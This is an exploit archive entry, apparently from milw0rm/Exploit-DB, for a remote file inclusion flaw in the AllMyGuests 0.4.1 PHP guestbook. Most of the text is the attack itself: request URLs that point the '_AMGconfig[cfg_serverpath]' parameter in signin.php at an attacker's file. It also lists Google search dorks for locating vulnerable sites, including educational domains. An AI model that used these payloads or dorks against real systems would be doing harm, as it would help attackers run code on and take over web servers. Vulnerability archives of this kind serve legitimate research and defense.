AllMyGuests 0.4.1 - 'cfg_serverpath' Remote File Inclusion

EDB-ID:

2405


Author:

Br@Him

Type:

webapps


Platform:

PHP

Date:

2006-09-20


#============================================================================#
#
# AllMyGuests =>  ?_AMGconfig[cfg_serverpath] Remote File Inclusion Exploit
#============================================================================#
#           
# Scirpt Infected signin.php
#
# Critical level : Dangerous
#============================================================================#
#
# By Br@Him Ma-Edition
#============================================================================# 
#
# Http://www.Af-Team.com
#
# Arabian-FighterZ Crew
#
#
#
#
#=============================================================================#
#
#
# Exploit:
###################################################################################################
#
# Http://www.Victime.com/modules.php?name=allmyguests
# http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
#
#
# Search Google ( Nuke ET Copyright © 2004 por Truzone. )
# ( allinurl:*.edu.*/modules.php?name=allmyguests )
# ( "powered by AllMyGuests" )
#
# To Contact: Brahim@legenie.net or Brahim118@yahoo.fr
#
# Greet : Silitoad STr0ke. Sn1p8r. Ope3runix . Simo64 .The_Condor.r00ted . Silitix . Zakix .Daftrix.
# Oli Nsinah lmera lmajia :P
###################################################################################################
By Morocco

Notes:
Nuke module as well as the standalone is vulnerable.
http://www.vicitime.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
http://www.vicitime.com/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=Attacker
/str0ke

# milw0rm.com [2006-09-20]